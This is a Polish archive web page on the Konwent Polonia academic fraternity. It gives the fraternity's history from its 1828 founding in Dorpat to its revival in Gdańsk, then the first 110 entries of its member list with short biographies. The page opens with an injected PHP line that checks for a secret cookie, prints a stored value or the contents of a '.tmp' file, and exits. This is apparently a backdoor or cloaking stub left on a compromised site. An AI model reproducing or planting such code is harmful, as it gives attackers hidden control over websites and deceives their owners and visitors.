if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Konwent Polonia

Dekiel Leszka Stefana Szaciłło. Nazwa:
Konwent Polonia
Siedziba:
1828-1918 Dorpat, 1918-1919 Warszawa, 1919-1939 Wilno, od 1940 r. Londyn, od 1998 r. Gdańsk
Data powstania:
1828 r.
Barwy:
amarantowa – błękitna – biała (symbolika barw: Korona, Litwa, Ruś)
Dewiza:
„Jeden za wszystkich, wszyscy za jednego”

Rys historyczny

Konwent Polonia, Dorpat ok. 1915 r.

Konwent Polonia jest najstarszą współcześnie istniejącą polską korporacją akademicką. Wcześniej w 1816 r. powstała jedynie wrocławska Polonia. Najprawdopodobniej Konwent Polonia jest także najstarszym czynnie działającym polskim związkiem akademickim.

Został założony 3 V 1828 r. przez polskich studentów słuchaczy Uniwersytetu w Dorpacie. Zgodnie z podaniem twórcami byli Filareci, którzy w połowie lat 20-tych XIX wieku w związku z represjami carskimi przybyli z Wilna do Dorpatu. Konwent Polonia powstał na wzór istniejących od początku XIX wieku w Dorpacie korporacji niemieckich. W odróżnieniu od nich nie był typowym ziomkostwem (”Landsmannschaft”) zrzeszającym młodzież z określonej prowincji Inflant, ale “reprezentował cały obszar i niewygasłą tradycję przedrozbiorowej Rzeczypospolitej”: Koronę, Litwę i Ruś. “Polskość Konwentu” miała, w każdym razie przez większość XIX wieku, charakter nie tyle etniczny, co historyczno-kulturowy.

Kwatera Konwentu Polonia, Wilno ok. 1928 r.

W okresie 90 lat od 1828 do 1918 w Dorpacie Konwent Polonia istniał w różnych formach organizacyjnych i pod różnymi nazwami (”Polonia”, “Ogół”, “Szczegół”, “Konwent Polski”, “Koło Przyrodników”). Okresowo zaprzestawał także wszelkiej działalności (1832-1934, 1843-48) bądź działał tajnie (po 1863). Poza pierwszymi latami działalności oraz okresem 1907-1918 Konwent Polonia nie przypominał typowej korporacji akademickiej. Było to związane z warunkami, w których przyszło mu funkcjonować, represjami władz carskich oraz ograniczeniami administracyjnymi na Uniwersytecie w Dorpacie. Liczni Polonusi uczestniczyli w różnych formach działalności patriotycznej i walki przeciw zaborcom. Członkowie Konwentu in gremio wzięli udział w powstaniu listopadowym i powstaniu styczniowym. Wielu z nich poległo, zostało zesłanych bądź podlegało innym represjom.

W okresie liberalizacji reżimu carskiego po rewolucji 1905 r., Konwent Polonia w 1907 r. przyjmuje zewnętrzne formy korporacji akademickich. Powstają także związki filisterskie w Warszawie (”Związek Dorpatczyków”) oraz w Wilnie (”Koło Filistrów Polonii”).

Dewizka Alojzego Kirsteina, pierwsza połowa lat 20-tych.

W latach 1918-19 podjęto próbę ustanowienia głównej siedziby Konwentu w Warszawie. Ostatecznie jednak już po zakończeniu pierwszej wojny światowej i wskrzeszeniu Uniwersytetu Wileńskiego dnia 17 XII 1919 r. zadecydowano o przeniesieniu siedziby Konwentu do Wilna. Kuratorem Polonii z ramienia Senatu Uniwersytetu został Filister Polonii prof. Bronisław Wróblewski. Siedziba Korporacji mieściła się przy ul. Królewskiej 7/11a w Wilnie (1935/36).

Na fali uniesienia związanego z odzyskaniem niepodległości dnia 17 III 1921 r. Konwent podpisał z K! Polonia z Poznania akt unifikacji tworząc Związek Akademicki konwent „Polonia” z równouprawnionymi konwentami w Wilnie i Poznaniu. Związek ten nie przetrwał próby czasu i z powodu istniejących napięć został zerwany przez wileńską Polonię w 1924 r.

Stulecie Konwentu Polonia, Wilno 12-14 X 1929 r.

Konwent Polonia należał do największych i najbardziej prężnych korporacji akademickich okresu międzywojennego. Był jedynym z sześciu związków, które w 1921 r. utworzyły Związek Polskich Korporacji Akademickich (data starszeństwa związkowego: 3 V 1828 r.). Wielkim wydarzeniem nie tylko dla Polonii, ale dla całego polskiego ruchu korporacyjnego były obchody z okazji 100 rocznicy powstania Konwentu Polonia, które odbyły się w dniach 12-14 października 1928 r. Z tej okazji został wydany przez Prezydium Związku Polskich Korporacji Akademickich “Rocznik Korporacyjny 1828-1928″ (Warszawa 1928) - najważniejsza publikacja korporacyjna okresu międzywojnia. Ze względu na różnice poglądów, w szczególności rozumienia zasady apolityczności korporacji oraz stosunku korporacji związkowych do obozu sanacyjnego, Konwent Polonia w latach 1933-1939 pozostawał poza strukturami Związku. Z kolei w 1937 r. w trakcie pobytu w Wilnie marszałka Edwarda Rydza-Śmigłego z okazji nadania mu doktoratu honoris causa przez Senat USB, złożył on wizytę na Kwaterze Konwentu Polonia.

Konkurs Bachusa, Wilno 1929 r.

Przy Konwencie Polonia kandydowały: w 1928 r. K! Leonidania oraz w 1930 r. K! Concordia Vilnensis.

Wilno 1 II 1934 r.

Konwent Polonia zawarł kartele: 5 XII 1909 r. wieczysty z K! Arkonia, 3 V 1923 r. z K! Welecja (początkowo na pięć lat, 14 X 1928 r. przedłużony na wieczysty) oraz 14 X 1928 r. z K! Jagiellonia (początkowo na dziesięć lat, 20 XI 1938 r. przedłużony na wieczysty).

Oficjalna imienna lista członków Konwentu Polonia za lata 1828-1939 obejmuje 1511 osób.

Okładka śpiewnika Konwentu Polonia, Londyn 1969 r.

W czasie okupacji, jako jedna z nielicznych korporacji, Konwent Polonia kontynuował w ograniczonym zakresie działalność organizując spotkania w zajętym przez Litwinów, Rosjan i Niemców Wilnie. Już w okresie wojny spotkania koleżeńskie Polonusów odbywały się także w Londynie. W 1940 r. wznowiło tam działalność Koło Filistrów. W okresie powojennym w Londynie do Konwentu przyjęty został syn przedwojennego Polonusa Kazimierz Koziełł-Poklewski. Nieprzerwanie na emigracji, w kraju od 1958 r. odbywały się oficjalne i nieoficjalne spotkania Polonii i Polonusów.

Obchody 141-tej rocznicy powstania Konwentu Polonia, Londyn 15 XI 1969 r.

Szczególnie uroczyście obchodzono okrągłe rocznice założenia Konwentu: w Londynie 141-lecia w 1969 r., w Londynie i w Warszawie 150-lecia w 1978 r. oraz w Warszawie 160-lecia w 1988 r. W związku z tymi uroczystościami w Londynie wydano w 1969 r. “Pieśni Konwentu Polonia” oraz w 1978 r. zarys historii korporacji A. Minkiewicza “Konwent Polonia 1928-1978. W 150. rocznicę założenia w Dorpacie pierwszej polskiej korporacji akademickiej”. W latach 1968-88 ufundowano także cztery tablice pamiątkowe.

Obchody 160-tej rocznicy powstania Konwentu Polonia, Warszawa 7 V 1988 r.

W dniu 9 XI 1968 r. w Warszawie w kościele pw. św. Marcina na Starym Mieście oraz dniu 3 maja 1971 r. w Londynie w kościele pw. św. Andrzeja Boboli wmurowano tablice ku czci zmarłych, poległych i zamordowanych członków Konwentu. W 1987 r. w Warszawie w kaplicy Matki Boskiej Ostrobramskiej w kościele pw. św. Karola (ul. Chłodna) ufundowano replikę tablicy pamiątkowej z Londynu. W dniu 23 kwietnia 1988 r. w Warszawie na kościele pw. św. Karola Boromeusza na Powązkach poświęcono tablicę ku czci członków Konwentu Polonia pomordowanych na Wschodzie.

Do reaktywacji Konwentu Polonia doszło w latach dziewięćdziesiątych. Do Koła Filistrów zostali przyjęci członkowie rodzin przedwojennych filistrów, a w 1998 r. doszło w Gdańsku do reaktywacji korporacji w pod nazwą “Konwent Polonia Gedanensis”, którą po uzyskaniu zaufania filisteriatu przemianowano na “Konwent Polonia” i uznano za pełnoprawnego kontynuatora przedwojennego Konwentu (vide www.konwentpolonia.pl).

 

Lista członków

Poniższa, oficjalna lista członków Konwentu Polonia obejmuje ponad tysiąc pięćset nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Julian Anastazy Abłamowicz, (1817 - ?) - s. Piotra, coetus I sem. 1837, ziemianin [111]
 2. Kazimierz Abramowicz, (1903 - 7 kwietnia 1970 w Londynie) s. Józefa, ochotnik WP 1920, student prawa USB, c. II sem. 1923/1924 Konwent Polonia, sędzia Okręgowy Śledczy w Wilnie (do spraw specjalnej wagi - politycznych, głównie komunistów), aresztowany przez NKWD, w dniu wybuchu wojny z Niemcami wywieziony do ZSRR, w Buzułuku szef Referatu Prawnego II Oddziału Sztabu, wyszedł z II Korpusem. Pracował w poselstwie RP w Teheranie, później w Libanie. Po wojnie w Stanach Zjednoczonych, działacz emigracyjny, m.in. delegat do Kongresu Polonii amerykańskiej, działacz Polonii na emigracji, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago [nr ew. 1373]
 3. Iskander Achmatowicz, (1896 - 1941) - s. Aleksandra, brat Osmana (1311) i Keryma I (1312), ochotnik WP (1920 -21), coetus II sem. 1922/23, oficer Jazdy Tatarskiej, odzn. Krzyżem Walecznych (dwukrotnie), Sędzia (w Skidlu, Słonimiu), aresztowany w sierpniu 1940 przez NKWD przy próbie przekroczenia granicy Litwy z Prusami Wsch., zamordowany w czasie ewakuacji więzienia (26 VI) [1359]
 4. Kerym I Achmatowicz, (1897 - po 1941) - s. Aleksandra, brat Osmana (131) i Iskandera (1359), coetus II sem. 1919/20, delegat K! na zjazdach ZPK!A w 1926 i 1927 r. - sprzeciwiał się próbom poddania korporacji wpływom partii polit. Ochotnik WP (1919 - 20) - w pułku Jazdy Tatarskiej. Sędzia Sądu Okr. w Wilnie. Uczestnik kamp. wrześniowej (w 3 DAK). Aresztowany w Wilnie w 1940 r., wywieziony do ZSRR 24 VI 1941 r. (ostatnim transportem) - „zaginął” [1312]
 5. Kerym II Achmatowicz, (1903 - 1986) - ochotnik WP (1920), coetus I sem. 1923/24, sędzia w Wilnie, wiceprokurator Sądu Okręgowego w Warszawie, Uczestnik kampanii wrześniowej 1939, jeniec oflagu Murnau [1370]
 6. Osman Achmatowicz, (1899 - 4 grudnia 1988) - s. Aleksandra (Alego), brat Keryma I (1312) i Iskandera (1359), coetus II sem. 1919/20, współautor Memoriału w sprawie sanacji K! (23 I 1922), ochotnik WP (1919 - 20) - w pułku Jazdy Tatarskiej im. płk. Mustafy Achmatowicza. Chemik, doc. USB, prof., dziekan U.W. Po wojnie współzałożyciel Politechniki Łódzkiej (profesor, dziekan, rektor), wicemin. Szk. Wyższego (1953 - 59), dyr. Instytutu Kultury Polskiej w Londynie (1964 - 69). Członek PAU, PAN, dr h.c. Polit. Łódzkiej. Biblioteka Chemiczna Polit. Łódzkiej nosi jego imię [1311]
 7. Gracjan Achrem-Achramowicz, (1899-1942) - s. Antoniego, brat Leona (1493), coetus I sem. 1923/24, autor “Pieśni fuksowskiej” ochotnik WP (1920), artysta grafik (teka linorytów: Via crucis - Wilno 1929). Wywieziony do ZSRR, zmarł 26 III [1368]
 8. Leon Achrem-Achramowicz, (1909 - 1971) - s. Antoniego, coetus I sem. 1935/36, brat Gracjana (1368), ppor. WP, ziemianin, żołnierz września, internowany na Węgrzech, przedostał się na Zachód, służył w armii brytyjskiej w Afryce Zach. Po wojnie osiadł w Walii, gdzie zmarł [1493]
 9. Jan Adamowicz, (1911-1935) - s. Wacława, coetus I sem. 1932/33, popełnił samobójstwo (powód nieznany) [1460]
 10. Leon Adelstein, (1832 - ?) - s. Jana, coetus II sem. 1851, studiów nie skończył, mieszkał w Warszawie [411]
 11. Edmund Alberti, (1840 - 1886) - s. Wilhelma, coetus II sem. 1860, pastor e.a. w Wyszogrodzie [602]
 12. Antoni Aleksandrowicz, (1816 - przed 1889) - coetus II sem. 1832, urzędnik w Petersburgu [38]
 13. Henryk Ambroszkiewicz, (1909 - 21 listopada 1970) - s. Ernesta, coetus II sem. 1928/29, urzędnik Izby Kontroli Państw. w Wilnie, ppor. AK (Wilno - BIP), odzn. Krzyżem Walecznych. Po wojnie został w Wilnie. Aresztowany 11 VI 1946 r., oskarżony o „działalność kontrrewolucyjną”, skazany na 15 lat - w obozach: Obski ITŁ, Siewpieczłag, Dubrawłag. Odesłany do Polski 27 IX 1955 r., pracował w „Inco” [1430]
 14. Aleksander Anderson, (1812 - 1881) - s. Ottona, coetus I sem. 1832, nauczyciel [35A]
 15. Edward Andrzejewski, (1860 - ?) - coetus I sem. 1884, właściciel apteki w Mitawie [923]
 16. Henryk Andrzejewski, (1859 - 1917) - s. Franciszka, coetus II sem. 1883, lekarz w Eyragole (gub. kowieńska) [913]
 17. Julian (Juliusz) Andrzejkowicz, (1822 - 1898) - coetus II sem. 1839, założyciel Związku Narodowego Polskiego w USA, fabrykant [158]
 18. Konstanty Antonowicz, (1828 - po 1873) - s. Pawła, coetus II sem. 1850, lekarz w Jeziorossach, zesłany za powst. 1863 r. [368]
 19. Koronat Aramowicz, (1830 - 1869) - coetus I sem. 1853, lekarz, za powst. 1863 r. trzymany dwa lata w więzieniu [446]
 20. Wiktor Julian Aramowicz, (1816 - po 1891) - coetus I sem. 1838, protokolant Kolegium Kościoła Ew. Ref. w Wilnie [136]
 21. Franciszek Wilhelm de l’Arbre, (1834 - 1889) - s. Jana, brat Stanisława (496 A), coetus II sem. 1854, po powst. 1863 r. na emigracji, lekarz [496 B]
 22. Stanisław Eugeniusz de l’Arbre, (1833 - po 1872) - s. Jana, brat Franciszka (496 B), coetus II sem. 1854, gospodarz „Ogółu”, po powst 1863 r. na emigracji [496 A]
 23. Grzegorz Arkuszewski, (1831 - 1913) - s. Wincentego, ziemianin, coetus II sem. 1851 [399]
 24. Eugeniusz Arnold, (1866 - 1935) - s. Jana, coetus II sem. 1888, lekarz, w czasie I powst. śląskiego - członek Komitetu Pomocy Górnoślązakom (w Sosnowcu) [1034]

  Zygmunt Augustowski, 2007 r.

 25. Zygmunt Augustowski, (1 stycznia 1913 w Wilnie - 20 marca 2008 w Warszawie) - s. Witolda, ostatni Gospodarz i Skarbnik K! w Wilnie. Por. WP, żołnierz września, ranny trafił do niemieckiego szpitala, uciekł, złapany przez sowietów uciekł. Przy próbie przedostania się na Zachód, zatrzymany na Bałtyku przez Niemców, internowany na Pomorzu Zach. Zwolniony w czerwcu 1940 r.. Od września 1940 zaprzysiężony w ZWZ (W-wa). W 1942 przydział do „Wachlarza” (odc. V - Dyneburg). W pocz. 1943 d- ca ośrodka dywersji „Turmonty” - Komendy Okr. Wil. AK. 11 XI 1943 nominacja do st. rtm. W styczniu 1944 - d-ca „Kedywu” m. Wilna. Uczestnik walk o Wilno (operacja „Ostra Brama”). Przeniesiony do org. „NIE” (p-ko bolszewikom), jako d-ca oddz. specjalnego (dywersja - sabotaż), w marcu 1945 otrzymał rozkaz przeniesienia się do Polski „Lubelskiej”, wraz z swym oddziałem przez Białystok, na Wybrzeże. W kwietniu 1945 r. aresztowany w Sopocie, po trzech miesiącach odbity (przez brata Kazimierza - Weletę). Z polecenia KG WiN zorganizował grupę wywiadowczą. Aresztowany w sierpniu 1948 r., skazany na 10 lat więzienia (trzymany w W-wie na Rakowieckiej).W 1956 r. zwolniony. Później radca prawny diecezji poznańskiej. Ogromnie aktywny w życiu K! - jeden z najbardziej zasłużonych. Odzn. Virtuti Militari i Krzyżem Walecznych (trzykrotnie) [1470] Vide także nekrolog: Aktualności 2008

  “Z najnowszych publikacji naukowych, m.in.:
  – K. A. Tochman, Samozwańczy rotmistrz. Zygmunt Augustowski. Tajny współpracownik komunistycznych służb specjalnych ps. „Jan”, „Wiktor”, „San”, „Mociński”, „Bross”, „Civis”, “Wywiad i kontrwywiad wojskowy II RP. Z działalności Oddziału II SG WP”, cz. I (2019, t. 9) i cz. II (2020, t. 10),
  – T. Lenczewski, Raporty Zygmunta Augustowskiego – TW „Brossa” z pobytu w polskim Londynie, Brukseli, Paryżu i Rzymie w 1958 r., “Wywiad i kontrwywiad wojskowy II RP. Z działalności Oddziału II SG WP”, 2020, t. 10,
  wynika, że część powyższego biogramu może być fałszywa i spreparowana przez Z. Augustowskiego. Zachowane źródła dokumentalne dowodzą ponadto, że Z. Augustowski był przez kilkadziesiąt lat czynnym współpracownikiem Służby Bezpieczeństwa PRL.” vide oficjalne stanowisko Konwentu Polonia.

 26. Feliks Baczański, (1831 - 1875) - s. Stanisława, ziemianin z gub. kowieńskiej, coetus I sem. 1851 [386]
 27. Feliks Baczyński, (1847 - ?) - s. Samuela, ziemianin z lubelskiego, coetus I sem. 1868 [658]
 28. Olgierd Baczyński, (1909 - 1934) - s. Bronisława (Welecja), popełnił samobójstwo (nieszczęśliwa miłość) [1455]
 29. Ksawery Balczewski, (1828 - 1889) - s. Gabriela, coetus I sem. 1851, nauczyciel gimn. w Kaliszu [388]
 30. Stefan Baliński, (1887 - ?) - coetus II sem. 1912, lekarz [1275]
 31. Jan Balsewicz, (1887 - 26 sierpnia 1970) - coetus II sem. 1911, ochotnik WP (1918 -1921), odznaczony Virtuti Militari i Krzyżem Walecznych (dwukrotnie). Ppłk 6 p.p. Leg. Urzędnik w Dyr. Nacz. Lasów Państw [1261]
 32. Karol Baniewicz, (1827 - 1849) - coetus I sem. 1848, zmarł (utonął) w czasie studiów [306]
 33. Antoni Baranowski, (1821 - po 1869) - coetus II sem. 1843, lekarz, za powst. 1863 r. zesłany, zmarł w Krasnojarsku [219]
 34. Ignacy Baranowski, (1833 - 1919) - s. Jana, coetus II sem. 1852, lekarz, działacz społeczny, prof. Uniw. Warsz. Przewodniczący (1907 r.) Tow. b. Wychowanków Uniw. w Dorpacie, pamiętnikarz [430]
 35. Leonidas Baranowski, (1834 - 1863) - poległ pod Polimszą 19 V 1863 r.
 36. Wojciech Baranowski, (1845 - przed 1917) - coetus II sem. 1867, współautor libretta do konwentowej „operetki” Na kwaterze [655]
 37. Franciszek Barcz (Bartsch), (1825 - 1859) - coetus II sem. 1847, pastor e.a. w Wieluniu [292]
 38. Tytus Bartold, (1833 - ?) - s. Romualda (?), coetus II sem. 1851, prawnik w Warszawie i Kaliszu [402]
 39. Henryk Leopold Bartsch, (1832 - 1899) - s. Karola, coetus I sem. 1851, pastor e. a., superintendent warszawski, muzyk, tłumacz biografii kompozytorów, podróżnik [396]

  Tadeusz Bartoszewicz-Łuniewski, 1921 r.

 40. Tadeusz Bartoszewicz-Łuniewski, (1898 - 14 lipca 1970) - s. Piotra, coetus II sem. 1919/20, ochotnik WP (1919 - 21), v-prokurator Sądu Apel. w Katowicach [1309]

 41. Aleksander Baudouin de Courtenay, (1860 - 1926) - coetus 2 sem. 1883, astronom i urzędnik w Petersburgu [922]
 42. Janusz Bądzkiewicz, (1904 - 15 sierpnia 1974) - coetus II sem. 1926/27, ziemianin, podprokurator Sądu Okręgowego w Nowogródku. W czasie wojny w Gen. Guberni, był w AK. Po wojnie radca prawny w Sopocie, organizator życia K! na Wybrzeżu [1408]
 43. Piotr Beczkowski, (1818 - 1889) - coetus II sem. 1842, pastor e.a. w Iłowie [210]
 44. Aleksander Bein, (1827 - 1896) - s. Samuela, coetus I sem. 1845, plenipotent bankowy, za powst. 1863 r. zesłany [253]
 45. Hermann Benni, (1834 - 1900) - s. Jana, coetus II sem. 1854, pastor e.a., założyciel Szkoły Męskiej w Warszawie (zamkniętej przez władze), publicysta, redaktor „Ateneum” i „Kuriera Warszawskiego” [498]
 46. Ludwik Berens, (1833 - 1896) - coetus II sem. 1853, pastor e.a. w Nowym Dworze, superintendent warszawski [464]
 47. Ignacy Berond, (1837 - 1878) - coetus II sem. 1856, lekarz w Sarańsku (gub. penzeńska) [526]
 48. Wilhelm Beym, (1847 - ?) - s. Ludwika, coetus II sem. 1873, lekarz w Krakowskiem [719]
 49. Adam Bułhak, (1831 - 1904) - s. Macieja, ziemianin z gub. mińskiej, coetus I sem. 1852 [425]
 50. Bronisław Behrens, (1866 - 1938) - s. Ludwika (464), coetus II sem. 1888, pierwszy skarbnik Wil. Koła Filistrów, lekarz w Łowiczu i Zakroczymiu - płk WP [1020]
 51. Adam Benisławski, (1834 - 1860) - brat Edwarda (457), ziemianin z gub. witebskiej, coetus I sem. 1853 [458]
 52. Bolesław Benisławski, (1836 - 1886) - s. Antoniego, ziemianin pow. lucyński, gub. witebska, coetus I sem. 1854 [482]
 53. Edward Benisławski, (1835 - 1856) - brat Adama (458), coetus I sem. 1853, zmarł w czasie studiów [457]
 54. Józef Benisławski, (1830 - po 1878) - coetus I sem. 1848, gospodarz „Ogółu”, wysoki urzędnik na Kaukazie [309]
 55. Zygmunt Benisławski, (1834 - po 1898) - ziemianin z gub. witebskiej, coetus I sem. 1856, za powst. 1863 r. zesłany [518]
 56. Jerzy Berends, (ok. 1805 - po 1845) - s. Jeremiasza, lekarz, przed Dorpatem stud. Uniw. Wil., przeszedł na katolicyzm, zmienił nazwisko (z Königsberger), założyciel Konwentu Polonia. [6]
 57. Franciszek Bereśniewicz, (1868 - 1931) - s. Jana, coetus I sem. 1889, lekarz w Petersburgu, później w Zawierciu [1039]
 58. Bolesław Bernatowicz, (1877 - 1938) - s. Henryka, coetus I sem. 1897, lekarz w Petersburgu [1112]
 59. Kazimierz Bernstein, (1833 - 1902) - s. Józefa, coetus I sem. 1852, lekarz w Warszawie [417]
 60. Czesław Beuermann (Beüermann), (1901- 20 sierpnia 1976 w Inowrocławiu) - s. Ottona, coetus II sem. 1922/23, adwokat, pracownik Państw. Banku Rolnego (oddz. w Wilnie), po wojnie adwokat w Inowrocławiu [1362]
 61. Adolf Biederman, (1834 - 1893) - s. Daniela, brat Eugeniusza (451), coetus I sem. 1854, pastor e.a. w Brzezinach [489]
 62. Eugeniusz Biederman, (1832 - 1912) - s. Daniela, brat Adolfa (490), coetus I sem. 1853, pastor e. a. superintendent piotrkowski [451]
 63. Bronisław Bielawski, (1839 - ?) - z Kowieńszczyzny, coetus II sem. 1861 [606]
 64. Józef Bieliński, (1835 - 1864) - coetus I sem. 1859, uczestnik powst. 1863 r., rozstrzelany 5 VI 1864 - Ostrów [588]
 65. Julian Bieniecki, (1829 - 1903) - coetus I sem. 1851, autor ustawy „Ogółu”, pierwszy jego gospodarz. Lekarz (w Grodnie), społecznik, zaprzyjaźniony z E. Orzeszkową [391]
 66. Jan Bieńkowski, (1863 - ?) - z Łomżyńskiego, coetus II sem. 1890, farmaceuta [1065]
 67. Józef Bieńkowski, (1880 - po 1941) - s. Ludwika, coetus II sem. 1901, ziemianin, aresztowany przez NKWD 21 IX 1939 r., zesłany do Uchtiżemłagu, zwolniony 18 IX 1941 r. - dalsze losy nieznane [1138]
 68. Józef Julian Biergiel, (1819 - 1885) - s. Franciszka, coetus II sem. 1845, pastor e. r. i nauczyciel gimn. w Słucku, bibliofil [254]
 69. Julian (Juliusz) Biernacki, (1841 - 1863) - coetus II sem. 1862, poległ w powst. 1863 r. [614]
 70. Stanisław Biernacki, (1859 - ?) - z Kalisza, coetus II sem. 1880 [846]
 71. Dionizy Bilczyński, (1815 - 1860) - coetus I sem. 1838, lekarz, autor pamiętnika [137]
 72. Franciszek Biliński, (1872 - 1947) - s. Józefa, coetus II sem. 1893, lekarz w Lublinie, kpt. lek. WP w l. 1918 -1921 [1093]
 73. Hipolit Billewicz, (1823 - 1901) - s. Franciszka, brat Karola (267), coetus II sem. 1844, tłumacz, filozof [240]
 74. Józef Billewicz, (1824 - 1886) - coetus II sem. 1844, urzędnik [239]
 75. Karol Billewicz, (1827 - ok. 1908) - s. Franciszka, brat Hipolita (240), ziemianin, coetus I sem. 1846, po 1870 r. na emigracji [267]
 76. Mieczysław Biskupski, (1886 - 1942) - z Warszawy, coetus II sem. 1913, rotmistrz kawalerii, adwokat w Warszawie, zamordowany w Auschwitz 10 XI [1288]
 77. Seweryn Bitner, (1899 - 12 grudnia 1993) - ochotnik WP (1918 - 20), coetus II sem. 1921/22, magister inżynier USB, pracownik Państw. Banku Rolnego w Grudziądzu [1344]
 78. Edmund Bittner, (1848 - ?) - z Kalisza, coetus I sem. 1870 [675]
 79. Henryk Bloch, (1866 - ?) - s. Jana, coetus I sem. 1884, bankier, dziedzic dóbr Łęczna [926]
 80. Tadeusz Błażejewicz, (1884 - 1966) - s. Zygmunta, coetus I sem. 1908, przed wyzwoleniem w ruchu młodzieżowym, w 1918 r. dyr. Polskiej Macierzy Szkolnej. Od 1922 r. poseł na sejm RP kilku kadencji. Członek Nar. Dem. Stronnictwa Pracy. Redaktor tygodnika „Hasło”. W czasie II wojny w konspiracji. Po wojnie kierownik Biblioteki PWSM - Łódź [1216]
 81. Stanisław Błeszyński, (1819 - ?) - s. Grzegorza, coetus II sem. 1841, ziemianin, urzędnik [191]
 82. Stefan Błeszyński, (1891 - 1948) - coetus II sem. 1912, prokurator Sądu Najwyższego w Warszawie [1278]
 83. Brunon Bochwic, (1901 - 19 stycznia 1993) - s. Stanisława, ochotnik WP (1919-1920), inżynier rolnik UP, ziemianin, w 1943 r. więziony przez Niemców w obozie w Kołdyczewie k. Baranowicz, wywieziony na roboty do Prus Wschodnich Po wojnie w PCK Warszawa [1345]
 84. Edward Boerner, (1833 - 1910) - s. Ignacego, coetus II sem. 1850, pastor e.a. w Zduńskiej Woli, za powst. 1863 r. aresztowany, superintendent kaliski [369]
 85. Franciszek Bogatko, (1810 - 1864) - s. Tomasza, za powstanie 1863 r. zesłany. Coetus I sem. 1835, autor „Pieśni pożegnalnej” (Bracia w obcej krainie…) [85]
 86. Jan Bogdanowicz, (1846 - po 1883) - ziemianin, coetus I sem. 1865, później st. rewident Tow. Kolejowego Nowyj Torżok, Ptsb. [625]
 87. Leon Bogdanowicz, (1847 - ?) - s. Władysława, ziemianin w gub. kowieńskiej, coetus II sem. 1867 [653]
 88. Władysław Bogusławlewicz, (1904 - 1990) - ochotnik WP (1920), coetus II sem. 1923/24, ziemianin, w maju 1941 r. wywieziony do ZSRR, wyszedł z II Korpusem. Po wojnie emigrował do Argentyny. Zmarł w Buenos Aires [1379]
 89. Jan Bogusłowski, (1827 - ?) - s. Hipolita, brat Kazimierza (359) i Wojciecha (360), ziemianin, coetus I sem. 1850 [361]
 90. Józef Bogusławski, (1818 - 1858) - s. Hipolita, coetus I sem. 1837, spiskowiec, uczestnik spisku K. Hildebrandta, dwukrotnie zesłany, pamiętnikarz [118]
 91. Kazimierz Bogusławski, (1825 - po 1869) - s. Hipolita, brat Wojciecha (360) i Jana (361), ziemianin w gub. grodzieńskiej, coetus I sem. 1850, zesłany za powst. 1863 r. [359]
 92. Bolesław Boguszewski, (1890 - 1918) -s. Juliana, z Mohylewszczyzny, coetus II sem. 1912, ochotnik w Korpusie Wschodnim, poległ pod Niemirowem [1280]
 93. Antoni Bohdanowicz, (1815 - przed 1889) - ziemianin w guberni grodzieńskiej, coetus II sem. 1832 [46]
 94. Bronisław Bohdanowicz, (1810 - 1884) - ziemianin, coetus II sem. 1834, uczestnik powstania 1863 r. [77]
 95. Juliusz Franciszek Bohdziewicz, (1820 - 1888) - ziemianin z Inflant, coetus I sem. 1842 [197]
 96. Justyn Bohdziewicz, (1807 - 1840) - coetus II sem. 1832, zmarł w czasie studiów [40]
 97. Albrecht Bohusz, (1834 - 1856) - z gub. kowieńskiej, coetus I sem. 1854, zmarł w czasie studiów [491]
 98. Teodor Bolcewicz, (1830 - 1851) - coetus II sem. 1848, zmarł w czasie studiów [311]
 99. Jan Bołbott, (1911 - 1939) - s. Jana, coetus I sem. 1930/31, świetny łyżwiarz, pracownik II oddz. Sztabu Głównego (kontrwywiad). We wrześniu 1939 r. ppor., d-ca plutonu „Tynne”, w batalionie „Sarny” KOP. Zginął śmiercią bohaterską (21 IX), zamordowany bestialsko przez sowietów (spalony) wraz z całym oddziałem. Odznaczony Virtuti Militari (pośmiertnie). Placówka Straży Granicznej w Dołhobrodach nosi jego imię. 17 IX 2008 na KUL odsłonięto tablicę jemu poświęconą [1444]
 100. Adam Czesław Bonasewicz, (19 grudnia 1881 w Słonimiu - po 1939) - s. Feliksa, brat Bolesława (1159), coetus II sem. 1902, inicjator nałożenia barw przez Konwent (w 1907 r.), jedna z ważniejszych postaci w dziejach Konwentu. Lekarz, mjr WP, Uczestnik walk o Wilno, Mińsk i obrony Warszawy (1919 - 1920). Wywieziony w 1939 r. zaginął w ZSRR [1146]
 101. Bolesław Bonasewicz, (1884-1938) - s. Feliksa, brat Adama (1146), coetus II sem. 1904, por. rez. art., dyr. Państw. Inst. Meteorolog. w W- wie [1159]
 102. Franciszek Bonczkowski (Bączkowski), (1845- ?) - coetus II sem. 1872, student chemii z Warszawy [708]
 103. Bolesław Borejsza, (1840 - ?) - coetus I sem. 1859, w 1861 r. delegat Konwentu do W-wy (w sprawie utworzenia Uniwersytetu), aresztowany i zesłany [587]
 104. Wilhelm Borewicz (Borowicz), (1807 - 1890) - s. Krzysztofa, założyciel Konwentu Polonia, lekarz [7]
 105. Wojciech Borkowski, (1843 - 1863) - coetus I sem. 1860, w powst. 1863 r., oficer w partii B. Dłuskiego, poległ pod Popielanami (pow. szawelski) 22 VI [594]
 106. Stefan Borowiecki, (1886 w Chmielniku - 1951 w Nowym Sączu) - coetus II sem. 1907, v. - prezes Sądu Okręgowego w Kielcach [1200]

  Adam Borowski.

 107. Adam Borowski, (1875 - 1918) - s. Adama, brat Janusza (Konwent Polonia, nr ew. 1102), ojciec Adama (Arkonia), c. I sem. 1897, lekarz w Grodźcu k. Będzina, w I Korpusie Polskim gen. Józefa Dowbor -Muśnickiego [nr ew. 1114]

 108. Adolf Borowski, (1852 - po 1880) - coetus I sem. 1871, lekarz w gub. kowieńskiej [685]

  Janusz Borowski.

 109. Janusz Borowski, (1874 - 1948) - s. Adama, brat Adama (Konwent Polonia, nr ew. 1102), stryj Adama (Arkonia), c. II sem. 1895, adwokat w Sosnowcu [nr ew. 1102]

 110. Stefan Borowiecki, (1886 - 1951) - coetus II sem. 1907, v. - prezes Sądu Okręgowego w Kielcach [1200]
